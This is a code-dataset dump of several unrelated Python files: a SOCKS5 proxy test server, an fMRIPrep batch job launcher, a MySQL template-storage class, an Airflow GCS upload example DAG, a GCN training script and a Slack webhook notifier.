def recvall(s, n):
'''Receive n bytes from a socket, or fail'''
rv = bytearray()
while n > 0:
d = s.recv(n)
if not d:
raise IOError('Unexpected end of stream')
rv.extend(d)
n -= len(d)
return rv
### Implementation classes
class Socks5Configuration(object):
'''Proxy configuration'''
def __init__(self):
self.addr = None # Bind address (must be set)
self.af = socket.AF_INET # Bind address family
self.unauth = False # Support unauthenticated
self.auth = False # Support authentication
class Socks5Command(object):
'''Information about an incoming socks5 command'''
def __init__(self, cmd, atyp, addr, port, username, password):
self.cmd = cmd # Command (one of Command.*)
self.atyp = atyp # Address type (one of AddressType.*)
self.addr = addr # Address
self.port = port # Port to connect to
self.username = username
self.password = password
def __repr__(self):
return 'Socks5Command(%s,%s,%s,%s,%s,%s)' % (self.cmd, self.atyp, self.addr, self.port, self.username, self.password)
class Socks5Connection(object):
def __init__(self, serv, conn, peer):
self.serv = serv
self.conn = conn
self.peer = peer
def handle(self):
'''
Handle socks5 request according to RFC1928
'''
try:
# Verify socks version
ver = recvall(self.conn, 1)[0]
if ver != 0x05:
raise IOError('Invalid socks version %i' % ver)
# Choose authentication method
nmethods = recvall(self.conn, 1)[0]
methods = bytearray(recvall(self.conn, nmethods))
method = None
if 0x02 in methods and self.serv.conf.auth:
method = 0x02 # username/password
elif 0x00 in methods and self.serv.conf.unauth:
method = 0x00 # unauthenticated
if method is None:
raise IOError('No supported authentication method was offered')
# Send response
self.conn.sendall(bytearray([0x05, method]))
# Read authentication (optional)
username = None
password = None
if method == 0x02:
ver = recvall(self.conn, 1)[0]
if ver != 0x01:
raise IOError('Invalid auth packet version %i' % ver)
ulen = recvall(self.conn, 1)[0]
username = str(recvall(self.conn, ulen))
plen = recvall(self.conn, 1)[0]
password = str(recvall(self.conn, plen))
# Send authentication response
self.conn.sendall(bytearray([0x01, 0x00]))
# Read connect request
(ver,cmd,rsv,atyp) = recvall(self.conn, 4)
if ver != 0x05:
raise IOError('Invalid socks version %i in connect request' % ver)
if cmd != Command.CONNECT:
raise IOError('Unhandled command %i in connect request' % cmd)
if atyp == AddressType.IPV4:
addr = recvall(self.conn, 4)
elif atyp == AddressType.DOMAINNAME:
n = recvall(self.conn, 1)[0]
addr = recvall(self.conn, n)
elif atyp == AddressType.IPV6:
addr = recvall(self.conn, 16)
else:
raise IOError('Unknown address type %i' % atyp)
port_hi,port_lo = recvall(self.conn, 2)
port = (port_hi << 8) | port_lo
# Send dummy response
self.conn.sendall(bytearray([0x05, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00]))
cmdin = Socks5Command(cmd, atyp, addr, port, username, password)
self.serv.queue.put(cmdin)
print('Proxy: ', cmdin)
# Fall through to disconnect
except Exception as e:
traceback.print_exc(file=sys.stderr)
self.serv.queue.put(e)
finally:
self.conn.close()
class Socks5Server(object):
def __init__(self, conf):
self.conf = conf
self.s = socket.socket(conf.af)
self.s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.s.bind(conf.addr)
self.s.listen(5)
self.running = False
self.thread = None
self.queue = Queue.Queue() # report connections and exceptions to client
def run(self):
while self.running:
(sockconn, peer) = self.s.accept()
if self.running:
conn = Socks5Connection(self, sockconn, peer)
thread = threading.Thread(None, conn.handle)
thread.daemon = True
thread.start()
def start(self):
assert(not self.running)
self.running = True
self.thread = threading.Thread(None, self.run)
self.thread.daemon = True
self.thread.start()
def stop(self):
self.running = False
# connect to self to end run loop
s = socket.socket(self.conf.af)
s.connect(self.conf.addr)
s.close()
self.thread.join()
| 35.397516 | 125 | 0.572732 |
from __future__ import print_function, division, unicode_literals
import socket, threading, Queue
import traceback, sys
AddressType:
IPV4 = 0x01
DOMAINNAME = 0x03
IPV6 = 0x04
)
while n > 0:
d = s.recv(n)
if not d:
raise IOError('Unexpected end of stream')
rv.extend(d)
n -= len(d)
return rv
t__(self):
self.addr = None
self.af = socket.AF_INET
self.unauth = False
self.auth = False
class Socks5Command(object):
def __init__(self, cmd, atyp, addr, port, username, password):
self.cmd = cmd
self.atyp = atyp
self.addr = addr
self.port = port
self.username = username
self.password = password
def __repr__(self):
return 'Socks5Command(%s,%s,%s,%s,%s,%s)' % (self.cmd, self.atyp, self.addr, self.port, self.username, self.password)
class Socks5Connection(object):
def __init__(self, serv, conn, peer):
self.serv = serv
self.conn = conn
self.peer = peer
def handle(self):
try:
ver = recvall(self.conn, 1)[0]
if ver != 0x05:
raise IOError('Invalid socks version %i' % ver)
nmethods = recvall(self.conn, 1)[0]
methods = bytearray(recvall(self.conn, nmethods))
method = None
if 0x02 in methods and self.serv.conf.auth:
method = 0x02
elif 0x00 in methods and self.serv.conf.unauth:
method = 0x00
if method is None:
raise IOError('No supported authentication method was offered')
self.conn.sendall(bytearray([0x05, method]))
username = None
password = None
if method == 0x02:
ver = recvall(self.conn, 1)[0]
if ver != 0x01:
raise IOError('Invalid auth packet version %i' % ver)
ulen = recvall(self.conn, 1)[0]
username = str(recvall(self.conn, ulen))
plen = recvall(self.conn, 1)[0]
password = str(recvall(self.conn, plen))
self.conn.sendall(bytearray([0x01, 0x00]))
(ver,cmd,rsv,atyp) = recvall(self.conn, 4)
if ver != 0x05:
raise IOError('Invalid socks version %i in connect request' % ver)
if cmd != Command.CONNECT:
raise IOError('Unhandled command %i in connect request' % cmd)
if atyp == AddressType.IPV4:
addr = recvall(self.conn, 4)
elif atyp == AddressType.DOMAINNAME:
n = recvall(self.conn, 1)[0]
addr = recvall(self.conn, n)
elif atyp == AddressType.IPV6:
addr = recvall(self.conn, 16)
else:
raise IOError('Unknown address type %i' % atyp)
port_hi,port_lo = recvall(self.conn, 2)
port = (port_hi << 8) | port_lo
self.conn.sendall(bytearray([0x05, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00]))
cmdin = Socks5Command(cmd, atyp, addr, port, username, password)
self.serv.queue.put(cmdin)
print('Proxy: ', cmdin)
except Exception as e:
traceback.print_exc(file=sys.stderr)
self.serv.queue.put(e)
finally:
self.conn.close()
class Socks5Server(object):
def __init__(self, conf):
self.conf = conf
self.s = socket.socket(conf.af)
self.s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.s.bind(conf.addr)
self.s.listen(5)
self.running = False
self.thread = None
self.queue = Queue.Queue()
def run(self):
while self.running:
(sockconn, peer) = self.s.accept()
if self.running:
conn = Socks5Connection(self, sockconn, peer)
thread = threading.Thread(None, conn.handle)
thread.daemon = True
thread.start()
def start(self):
assert(not self.running)
self.running = True
self.thread = threading.Thread(None, self.run)
self.thread.daemon = True
self.thread.start()
def stop(self):
self.running = False
s = socket.socket(self.conf.af)
s.connect(self.conf.addr)
s.close()
self.thread.join()
| true | true |
f725d9b75a08ba36d8046190c73a204e849ad713 | 6,589 | py | Python | clpipe/fmri_preprocess.py | keithcallenberg/clpipe | da1120bdcf820ba922c0a72792024007b232428c | [
"MIT"
] | 10 | 2019-02-06T19:32:49.000Z | 2022-02-01T20:41:05.000Z | clpipe/fmri_preprocess.py | keithcallenberg/clpipe | da1120bdcf820ba922c0a72792024007b232428c | [
"MIT"
] | 96 | 2019-02-06T17:10:59.000Z | 2022-03-30T19:08:49.000Z | clpipe/fmri_preprocess.py | keithcallenberg/clpipe | da1120bdcf820ba922c0a72792024007b232428c | [
"MIT"
] | 6 | 2020-06-26T18:51:59.000Z | 2021-09-16T06:55:04.000Z | import os
import click
import sys
import logging
from .batch_manager import BatchManager, Job
from .config_json_parser import ClpipeConfigParser
from .error_handler import exception_handler
@click.command()
@click.argument('subjects', nargs=-1, required=False, default=None)
@click.option('-config_file', type=click.Path(exists=True, dir_okay=False, file_okay=True), default=None,
help='Use a given configuration file. If left blank, uses the default config file, requiring definition of BIDS, working and output directories.')
@click.option('-bids_dir', type=click.Path(exists=True, dir_okay=True, file_okay=False),
help='Which BIDS directory to process. If a configuration file is provided with a BIDS directory, this argument is not necessary.')
@click.option('-working_dir', type=click.Path(dir_okay=True, file_okay=False),
help='Where to generate the working directory. If a configuration file is provided with a working directory, this argument is not necessary.')
@click.option('-output_dir', type=click.Path(dir_okay=True, file_okay=False),
help='Where to put the preprocessed data. If a configuration file is provided with a output directory, this argument is not necessary.')
@click.option('-log_dir', type=click.Path(dir_okay=True, file_okay=False),
help='Where to put HPC output files (such as SLURM output files)')
@click.option('-submit', is_flag=True, default=False, help='Flag to submit commands to the HPC')
@click.option('-debug', is_flag=True, help='Flag to enable detailed error messages and traceback')
def fmriprep_process(bids_dir=None, working_dir=None, output_dir=None, config_file=None, subjects=None,log_dir=None,submit=False, debug=False):
"""This command runs a BIDS formatted dataset through fMRIprep. Specify subject IDs to run specific subjects. If left blank, runs all subjects."""
if not debug:
sys.excepthook = exception_handler
logging.basicConfig(level=logging.INFO)
else:
logging.basicConfig(level=logging.DEBUG)
config = ClpipeConfigParser()
config.config_updater(config_file)
config.setup_fmriprep_directories(bids_dir, working_dir, output_dir, log_dir)
if not any([config.config['FMRIPrepOptions']['BIDSDirectory'], config.config['FMRIPrepOptions']['OutputDirectory'],
config.config['FMRIPrepOptions']['WorkingDirectory'],
config.config['FMRIPrepOptions']['LogDirectory']]):
raise ValueError(
'Please make sure the BIDS, working and output directories are specified in either the configfile or in the command. At least one is not specified.')
singularity_string = '''unset PYTHONPATH; {templateflow1} singularity run -B {templateflow2}{bindPaths} {batchcommands} {fmriprepInstance} {bids_dir} {output_dir} participant ''' \
'''--participant-label {participantLabels} -w {working_dir} --fs-license-file {fslicense} {threads} {otheropts}'''
docker_string = '''docker run --rm -ti'''\
'''-v {fslicense}:/opt/freesurfer/license.txt:ro '''\
'''-v {bids_dir}:/data:ro -v {output_dir}:/out ''' \
'''-v {working_dir}:/work ''' \
'''{docker_fmriprep} /data /out participant -w /work {threads} {otheropts} --participant-label {participantLabels}'''
if config.config['FMRIPrepOptions']['TemplateFlowToggle']:
template1 = "export SINGULARITYENV_TEMPLATEFLOW_HOME={templateflowpath};".format(templateflowpath=config.config["FMRIPrepOptions"]["TemplateFlowPath"])
template2 = "${{TEMPLATEFLOW_HOME:-$HOME/.cache/templateflow}}:{templateflowpath},".format(templateflowpath =config.config["FMRIPrepOptions"]["TemplateFlowPath"])
else:
template1 = ""
template2 = ""
if not subjects:
subjectstring = "ALL"
sublist = [o.replace('sub-', '') for o in os.listdir(config.config['FMRIPrepOptions']['BIDSDirectory'])
if os.path.isdir(os.path.join(config.config['FMRIPrepOptions']['BIDSDirectory'], o)) and 'sub-' in o]
else:
subjectstring = " , ".join(subjects)
sublist = subjects
batch_manager = BatchManager(config.config['BatchConfig'], config.config['FMRIPrepOptions']['LogDirectory'])
batch_manager.update_mem_usage(config.config['FMRIPrepOptions']['FMRIPrepMemoryUsage'])
batch_manager.update_time(config.config['FMRIPrepOptions']['FMRIPrepTimeUsage'])
batch_manager.update_nthreads(config.config['FMRIPrepOptions']['NThreads'])
batch_manager.update_email(config.config["EmailAddress"])
if batch_manager.config['ThreadCommandActive']:
threads = '--nthreads ' + batch_manager.get_threads_command()[1]
else:
threads = ''
for sub in sublist:
if config.config['FMRIPrepOptions']['DockerToggle']:
batch_manager.addjob(Job("sub-" + sub + "_fmriprep", docker_string.format(
docker_fmriprep=config.config['FMRIPrepOptions']['DockerFMRIPrepVersion'],
bids_dir=config.config['FMRIPrepOptions']['BIDSDirectory'],
output_dir=config.config['FMRIPrepOptions']['OutputDirectory'],
working_dir=config.config['FMRIPrepOptions']['WorkingDirectory'],
participantLabels=sub,
fslicense=config.config['FMRIPrepOptions']['FreesurferLicensePath'],
threads= threads,
otheropts=config.config['FMRIPrepOptions']['CommandLineOpts']
)))
else:
batch_manager.addjob(Job("sub-" + sub + "_fmriprep", singularity_string.format(
templateflow1 = template1,
templateflow2 = template2,
fmriprepInstance=config.config['FMRIPrepOptions']['FMRIPrepPath'],
bids_dir=config.config['FMRIPrepOptions']['BIDSDirectory'],
output_dir=config.config['FMRIPrepOptions']['OutputDirectory'],
working_dir=config.config['FMRIPrepOptions']['WorkingDirectory'],
batchcommands=batch_manager.config["FMRIPrepBatchCommands"],
participantLabels=sub,
fslicense=config.config['FMRIPrepOptions']['FreesurferLicensePath'],
threads= threads,
bindPaths=batch_manager.config['SingularityBindPaths'],
otheropts=config.config['FMRIPrepOptions']['CommandLineOpts']
)))
batch_manager.compilejobstrings()
if submit:
batch_manager.submit_jobs()
else:
batch_manager.print_jobs()
| 59.9 | 184 | 0.682805 | import os
import click
import sys
import logging
from .batch_manager import BatchManager, Job
from .config_json_parser import ClpipeConfigParser
from .error_handler import exception_handler
@click.command()
@click.argument('subjects', nargs=-1, required=False, default=None)
@click.option('-config_file', type=click.Path(exists=True, dir_okay=False, file_okay=True), default=None,
help='Use a given configuration file. If left blank, uses the default config file, requiring definition of BIDS, working and output directories.')
@click.option('-bids_dir', type=click.Path(exists=True, dir_okay=True, file_okay=False),
help='Which BIDS directory to process. If a configuration file is provided with a BIDS directory, this argument is not necessary.')
@click.option('-working_dir', type=click.Path(dir_okay=True, file_okay=False),
help='Where to generate the working directory. If a configuration file is provided with a working directory, this argument is not necessary.')
@click.option('-output_dir', type=click.Path(dir_okay=True, file_okay=False),
help='Where to put the preprocessed data. If a configuration file is provided with a output directory, this argument is not necessary.')
@click.option('-log_dir', type=click.Path(dir_okay=True, file_okay=False),
help='Where to put HPC output files (such as SLURM output files)')
@click.option('-submit', is_flag=True, default=False, help='Flag to submit commands to the HPC')
@click.option('-debug', is_flag=True, help='Flag to enable detailed error messages and traceback')
def fmriprep_process(bids_dir=None, working_dir=None, output_dir=None, config_file=None, subjects=None,log_dir=None,submit=False, debug=False):
if not debug:
sys.excepthook = exception_handler
logging.basicConfig(level=logging.INFO)
else:
logging.basicConfig(level=logging.DEBUG)
config = ClpipeConfigParser()
config.config_updater(config_file)
config.setup_fmriprep_directories(bids_dir, working_dir, output_dir, log_dir)
if not any([config.config['FMRIPrepOptions']['BIDSDirectory'], config.config['FMRIPrepOptions']['OutputDirectory'],
config.config['FMRIPrepOptions']['WorkingDirectory'],
config.config['FMRIPrepOptions']['LogDirectory']]):
raise ValueError(
'Please make sure the BIDS, working and output directories are specified in either the configfile or in the command. At least one is not specified.')
singularity_string = '''unset PYTHONPATH; {templateflow1} singularity run -B {templateflow2}{bindPaths} {batchcommands} {fmriprepInstance} {bids_dir} {output_dir} participant ''' \
'''--participant-label {participantLabels} -w {working_dir} --fs-license-file {fslicense} {threads} {otheropts}'''
docker_string = '''docker run --rm -ti'''\
'''-v {fslicense}:/opt/freesurfer/license.txt:ro '''\
'''-v {bids_dir}:/data:ro -v {output_dir}:/out ''' \
'''-v {working_dir}:/work ''' \
'''{docker_fmriprep} /data /out participant -w /work {threads} {otheropts} --participant-label {participantLabels}'''
if config.config['FMRIPrepOptions']['TemplateFlowToggle']:
template1 = "export SINGULARITYENV_TEMPLATEFLOW_HOME={templateflowpath};".format(templateflowpath=config.config["FMRIPrepOptions"]["TemplateFlowPath"])
template2 = "${{TEMPLATEFLOW_HOME:-$HOME/.cache/templateflow}}:{templateflowpath},".format(templateflowpath =config.config["FMRIPrepOptions"]["TemplateFlowPath"])
else:
template1 = ""
template2 = ""
if not subjects:
subjectstring = "ALL"
sublist = [o.replace('sub-', '') for o in os.listdir(config.config['FMRIPrepOptions']['BIDSDirectory'])
if os.path.isdir(os.path.join(config.config['FMRIPrepOptions']['BIDSDirectory'], o)) and 'sub-' in o]
else:
subjectstring = " , ".join(subjects)
sublist = subjects
batch_manager = BatchManager(config.config['BatchConfig'], config.config['FMRIPrepOptions']['LogDirectory'])
batch_manager.update_mem_usage(config.config['FMRIPrepOptions']['FMRIPrepMemoryUsage'])
batch_manager.update_time(config.config['FMRIPrepOptions']['FMRIPrepTimeUsage'])
batch_manager.update_nthreads(config.config['FMRIPrepOptions']['NThreads'])
batch_manager.update_email(config.config["EmailAddress"])
if batch_manager.config['ThreadCommandActive']:
threads = '--nthreads ' + batch_manager.get_threads_command()[1]
else:
threads = ''
for sub in sublist:
if config.config['FMRIPrepOptions']['DockerToggle']:
batch_manager.addjob(Job("sub-" + sub + "_fmriprep", docker_string.format(
docker_fmriprep=config.config['FMRIPrepOptions']['DockerFMRIPrepVersion'],
bids_dir=config.config['FMRIPrepOptions']['BIDSDirectory'],
output_dir=config.config['FMRIPrepOptions']['OutputDirectory'],
working_dir=config.config['FMRIPrepOptions']['WorkingDirectory'],
participantLabels=sub,
fslicense=config.config['FMRIPrepOptions']['FreesurferLicensePath'],
threads= threads,
otheropts=config.config['FMRIPrepOptions']['CommandLineOpts']
)))
else:
batch_manager.addjob(Job("sub-" + sub + "_fmriprep", singularity_string.format(
templateflow1 = template1,
templateflow2 = template2,
fmriprepInstance=config.config['FMRIPrepOptions']['FMRIPrepPath'],
bids_dir=config.config['FMRIPrepOptions']['BIDSDirectory'],
output_dir=config.config['FMRIPrepOptions']['OutputDirectory'],
working_dir=config.config['FMRIPrepOptions']['WorkingDirectory'],
batchcommands=batch_manager.config["FMRIPrepBatchCommands"],
participantLabels=sub,
fslicense=config.config['FMRIPrepOptions']['FreesurferLicensePath'],
threads= threads,
bindPaths=batch_manager.config['SingularityBindPaths'],
otheropts=config.config['FMRIPrepOptions']['CommandLineOpts']
)))
batch_manager.compilejobstrings()
if submit:
batch_manager.submit_jobs()
else:
batch_manager.print_jobs()
| true | true |
f725db44f7c222d549edd398c8d51bd4cea4c003 | 2,788 | py | Python | db/tpl.py | iamaguoke/qiandao | a60b99ceb7c22a6dcec14621c00a4c1a7c02e940 | [
"MIT"
] | 40 | 2021-07-29T18:31:28.000Z | 2022-03-28T12:56:11.000Z | db/tpl.py | iamaguoke/qiandao | a60b99ceb7c22a6dcec14621c00a4c1a7c02e940 | [
"MIT"
] | 35 | 2021-08-20T03:47:54.000Z | 2022-02-26T12:36:11.000Z | db/tpl.py | iamaguoke/qiandao | a60b99ceb7c22a6dcec14621c00a4c1a7c02e940 | [
"MIT"
] | 12 | 2021-08-01T12:55:51.000Z | 2022-03-19T11:11:48.000Z | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
# vim: set et sw=4 ts=4 sts=4 ff=unix fenc=utf8:
# Author: Binux<i@binux.me>
# http://binux.me
# Created on 2014-08-07 22:27:07
import time
import config
from .basedb import BaseDB
class TPLDB(BaseDB):
'''
tpl db
id, userid, siteurl, sitename, banner, disabled, public, fork, har, tpl, variables, interval, note, ctime, mtime, atime, last_success
'''
__tablename__ = 'tpl'
def __init__(self, host=config.mysql.host, port=config.mysql.port,
database=config.mysql.database, user=config.mysql.user, passwd=config.mysql.passwd, auth_plugin=config.mysql.auth_plugin):
import mysql.connector
self.conn = mysql.connector.connect(user=user, password=passwd, host=host, port=port,
database=database, auth_plugin=auth_plugin, autocommit=True)
def add(self, userid, har, tpl, variables, interval=None):
now = time.time()
insert = dict(
userid = userid,
siteurl = None,
sitename = None,
banner = None,
disabled = 0,
public = 0,
fork = None,
har = har,
tpl = tpl,
variables = variables,
interval = interval,
ctime = now,
mtime = now,
atime = now,
last_success = None,
)
return self._insert(**insert)
def mod(self, id, **kwargs):
return self._update(where="id=%s" % self.placeholder, where_values=(id, ), **kwargs)
def get(self, id, fields=None):
for tpl in self._select2dic(what=fields, where='id=%s' % self.placeholder, where_values=(id, )):
return tpl
def delete(self, id):
self._delete(where="id=%s" % self.placeholder, where_values=(id, ))
def incr_success(self, id):
self._execute('UPDATE %s SET success_count=success_count+1, last_success=%d WHERE `id`=%d' % (
self.escape(self.__tablename__), time.time(), int(id)))
def incr_failed(self, id):
self._execute('UPDATE %s SET failed_count=failed_count+1 WHERE `id`=%d' % (
self.escape(self.__tablename__), int(id)))
def list(self, fields=None, limit=None, **kwargs):
where = '1=1'
where_values = []
for key, value in kwargs.items():
if value is None:
where += ' and %s is %s' % (self.escape(key), self.placeholder)
else:
where += ' and %s = %s' % (self.escape(key), self.placeholder)
where_values.append(value)
for tpl in self._select2dic(what=fields, where=where, where_values=where_values, limit=limit):
yield tpl
| 36.207792 | 137 | 0.571019 |
import time
import config
from .basedb import BaseDB
class TPLDB(BaseDB):
    """MySQL-backed persistence for task templates (the `tpl` table).

    Query plumbing (_insert/_update/_delete/_select2dic/_execute, plus
    `placeholder` and `escape`) is inherited from BaseDB.
    """
    __tablename__ = 'tpl'

    def __init__(self, host=config.mysql.host, port=config.mysql.port,
            database=config.mysql.database, user=config.mysql.user, passwd=config.mysql.passwd, auth_plugin=config.mysql.auth_plugin):
        # Imported lazily so the module can load without the driver installed.
        import mysql.connector
        self.conn = mysql.connector.connect(
            host=host, port=port, database=database, user=user,
            password=passwd, auth_plugin=auth_plugin, autocommit=True)

    def add(self, userid, har, tpl, variables, interval=None):
        """Insert a fresh template row for `userid` and return the new id."""
        now = time.time()
        row = {
            'userid': userid,
            'siteurl': None,
            'sitename': None,
            'banner': None,
            'disabled': 0,
            'public': 0,
            'fork': None,
            'har': har,
            'tpl': tpl,
            'variables': variables,
            'interval': interval,
            'ctime': now,
            'mtime': now,
            'atime': now,
            'last_success': None,
        }
        return self._insert(**row)

    def mod(self, id, **kwargs):
        """Update the row with primary key `id` from column=value kwargs."""
        return self._update(where="id=%s" % self.placeholder, where_values=(id, ), **kwargs)

    def get(self, id, fields=None):
        """Return the first row matching `id`, or None if it does not exist."""
        return next(iter(self._select2dic(what=fields, where='id=%s' % self.placeholder, where_values=(id, ))), None)

    def delete(self, id):
        """Remove the row with primary key `id`."""
        self._delete(where="id=%s" % self.placeholder, where_values=(id, ))

    def incr_success(self, id):
        """Increment success_count and record the current time as last_success."""
        table = self.escape(self.__tablename__)
        self._execute('UPDATE %s SET success_count=success_count+1, last_success=%d WHERE `id`=%d' % (
            table, time.time(), int(id)))

    def incr_failed(self, id):
        """Increment failed_count for the row with primary key `id`."""
        table = self.escape(self.__tablename__)
        self._execute('UPDATE %s SET failed_count=failed_count+1 WHERE `id`=%d' % (
            table, int(id)))

    def list(self, fields=None, limit=None, **kwargs):
        """Yield rows (as dicts) matching the column filters given as kwargs."""
        clauses = ['1=1']
        values = []
        for column, value in kwargs.items():
            if value is None:
                clauses.append('%s is %s' % (self.escape(column), self.placeholder))
            else:
                clauses.append('%s = %s' % (self.escape(column), self.placeholder))
                values.append(value)
        for row in self._select2dic(what=fields, where=' and '.join(clauses),
                                    where_values=values, limit=limit):
            yield row
| true | true |
f725db70338fae233d3d7b81bce2649a1d1b3d56 | 1,745 | py | Python | airflow/providers/google/cloud/example_dags/example_local_to_gcs.py | ChaseKnowlden/airflow | 6b71eac1997a7c0db3b8e3aed6b4e65d01871440 | [
"Apache-2.0"
] | 15,947 | 2019-01-05T13:51:02.000Z | 2022-03-31T23:33:16.000Z | airflow/providers/google/cloud/example_dags/example_local_to_gcs.py | ChaseKnowlden/airflow | 6b71eac1997a7c0db3b8e3aed6b4e65d01871440 | [
"Apache-2.0"
] | 14,603 | 2019-01-05T09:43:19.000Z | 2022-03-31T23:11:59.000Z | airflow/providers/google/cloud/example_dags/example_local_to_gcs.py | ChaseKnowlden/airflow | 6b71eac1997a7c0db3b8e3aed6b4e65d01871440 | [
"Apache-2.0"
] | 8,429 | 2019-01-05T19:45:47.000Z | 2022-03-31T22:13:01.000Z | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import os
from airflow import models
from airflow.providers.google.cloud.transfers.local_to_gcs import LocalFilesystemToGCSOperator
from airflow.utils import dates
# [START howto_gcs_environment_variables]
BUCKET_NAME = os.environ.get('GCP_GCS_BUCKET', 'example-bucket-name')
PATH_TO_UPLOAD_FILE = os.environ.get('GCP_GCS_PATH_TO_UPLOAD_FILE', 'example-text.txt')
DESTINATION_FILE_LOCATION = os.environ.get('GCP_GCS_DESTINATION_FILE_LOCATION', 'example-text.txt')
# [END howto_gcs_environment_variables]
# Run-once demo DAG: copy one local file into a GCS bucket.
with models.DAG(
    'example_local_to_gcs',
    schedule_interval='@once',
    default_args={'start_date': dates.days_ago(1)},
    tags=['example'],
) as dag:
    # [START howto_operator_local_filesystem_to_gcs]
    # Uploads PATH_TO_UPLOAD_FILE to gs://BUCKET_NAME/DESTINATION_FILE_LOCATION.
    upload_file = LocalFilesystemToGCSOperator(
        task_id="upload_file",
        src=PATH_TO_UPLOAD_FILE,
        dst=DESTINATION_FILE_LOCATION,
        bucket=BUCKET_NAME,
    )
    # [END howto_operator_local_filesystem_to_gcs]
| 38.777778 | 99 | 0.773066 |
import os
from airflow import models
from airflow.providers.google.cloud.transfers.local_to_gcs import LocalFilesystemToGCSOperator
from airflow.utils import dates
BUCKET_NAME = os.environ.get('GCP_GCS_BUCKET', 'example-bucket-name')
PATH_TO_UPLOAD_FILE = os.environ.get('GCP_GCS_PATH_TO_UPLOAD_FILE', 'example-text.txt')
DESTINATION_FILE_LOCATION = os.environ.get('GCP_GCS_DESTINATION_FILE_LOCATION', 'example-text.txt')
with models.DAG(
'example_local_to_gcs',
default_args=dict(start_date=dates.days_ago(1)),
schedule_interval='@once',
tags=['example'],
) as dag:
upload_file = LocalFilesystemToGCSOperator(
task_id="upload_file",
src=PATH_TO_UPLOAD_FILE,
dst=DESTINATION_FILE_LOCATION,
bucket=BUCKET_NAME,
)
| true | true |
f725dc18c0de850fd97c348c18d72de36f535c2c | 972 | py | Python | main.py | minkowski0125/multilayer-gcn-simulation | 15a4cd29d819246549148e3a32c99f3b8589f3b4 | [
"MIT"
] | null | null | null | main.py | minkowski0125/multilayer-gcn-simulation | 15a4cd29d819246549148e3a32c99f3b8589f3b4 | [
"MIT"
] | null | null | null | main.py | minkowski0125/multilayer-gcn-simulation | 15a4cd29d819246549148e3a32c99f3b8589f3b4 | [
"MIT"
] | null | null | null | import json
from utils import *
from config import args
from train import train
from torch.utils.tensorboard import SummaryWriter
if __name__ == '__main__':
    # Fix RNG seeds for reproducibility across runs.
    set_seed(args.seed)
    series = []
    if args.dataset == 'pubmed':
        graphs, features, adjs, labels = load_pubmed_data({
            'deg_num': args.deg,
            'sample_num': 1,
        })
    elif args.dataset == 'random':
        # NOTE(review): this branch also calls load_pubmed_data (only adding a
        # 'feat_dim' key) -- looks like a copy/paste of the 'pubmed' branch;
        # confirm whether a random-graph loader was intended. Also note that if
        # args.dataset matches neither branch, the train() call below raises
        # NameError on the unassigned graphs/features/adjs/labels.
        graphs, features, adjs, labels = load_pubmed_data({
            'deg_num': args.deg,
            'feat_dim': args.feat_dim,
            'sample_num': 1,
        })
    writer = SummaryWriter(f'./log_pubmed')
    hiddens = [50, 100, 200, 500, 1000, 1500, 2000, 3000]
    # Sweep hidden-layer widths; train() returns one result series per width.
    for hidden in hiddens:
        series.append(train(data = (graphs, features, adjs, labels), deg = args.deg, feat_dim = args.feat_dim, hidden_dim = hidden, layer_num = args.layer_num, o = 0, writer=writer))
        print()
    visualize(series, hiddens, 'hidden')
| 30.375 | 182 | 0.609053 | import json
from utils import *
from config import args
from train import train
from torch.utils.tensorboard import SummaryWriter
if __name__ == '__main__':
    # Fix RNG seeds for reproducibility across runs.
    set_seed(args.seed)
    series = []
    if args.dataset == 'pubmed':
        graphs, features, adjs, labels = load_pubmed_data({
            'deg_num': args.deg,
            'sample_num': 1,
        })
    elif args.dataset == 'random':
        # NOTE(review): also calls load_pubmed_data -- likely a copy/paste of
        # the 'pubmed' branch; confirm whether a random loader was intended.
        graphs, features, adjs, labels = load_pubmed_data({
            'deg_num': args.deg,
            'feat_dim': args.feat_dim,
            'sample_num': 1,
        })
    writer = SummaryWriter(f'./log_pubmed')
    hiddens = [50, 100, 200, 500, 1000, 1500, 2000, 3000]
    # Sweep hidden-layer widths; train() returns one result series per width.
    for hidden in hiddens:
        series.append(train(data = (graphs, features, adjs, labels), deg = args.deg, feat_dim = args.feat_dim, hidden_dim = hidden, layer_num = args.layer_num, o = 0, writer=writer))
        print()
    visualize(series, hiddens, 'hidden')
| true | true |
f725dc7d2c733d4a8ac8fe71d0f7b4f4d8da1077 | 292 | py | Python | camping_server2/bot/slackbot.py | solyourock/crawling_project | 068525f299eb180d46f1537ee2a02648bbec61ec | [
"MIT"
] | null | null | null | camping_server2/bot/slackbot.py | solyourock/crawling_project | 068525f299eb180d46f1537ee2a02648bbec61ec | [
"MIT"
] | null | null | null | camping_server2/bot/slackbot.py | solyourock/crawling_project | 068525f299eb180d46f1537ee2a02648bbec61ec | [
"MIT"
] | null | null | null | import requests, json
import camping_server2.config as config
class IncomingWebhook:
    """Posts error notifications to a Slack incoming webhook."""
    # Bug fix: the method was declared without `self`, so it only worked when
    # called on the class itself; @staticmethod keeps that call style working
    # and fixes calls made on an instance as well.
    @staticmethod
    def send_msg(err_msg):
        """Send `err_msg` as JSON to the configured Slack webhook channel."""
        payload = {"channel": "dss17", "username": "bot", "text": err_msg}
        response = requests.post(config.Config.WEBHOOK_URL, json.dumps(payload))
print(response) | 36.5 | 80 | 0.69863 | import requests, json
import camping_server2.config as config
class IncomingWebhook:
    """Posts error notifications to a Slack incoming webhook."""
    # Bug fix: the method was declared without `self`, so it only worked when
    # called on the class itself; @staticmethod keeps that call style working
    # and fixes calls made on an instance as well.
    @staticmethod
    def send_msg(err_msg):
        """Send `err_msg` as JSON to the configured Slack webhook channel."""
        payload = {"channel": "dss17", "username": "bot", "text": err_msg}
        response = requests.post(config.Config.WEBHOOK_URL, json.dumps(payload))
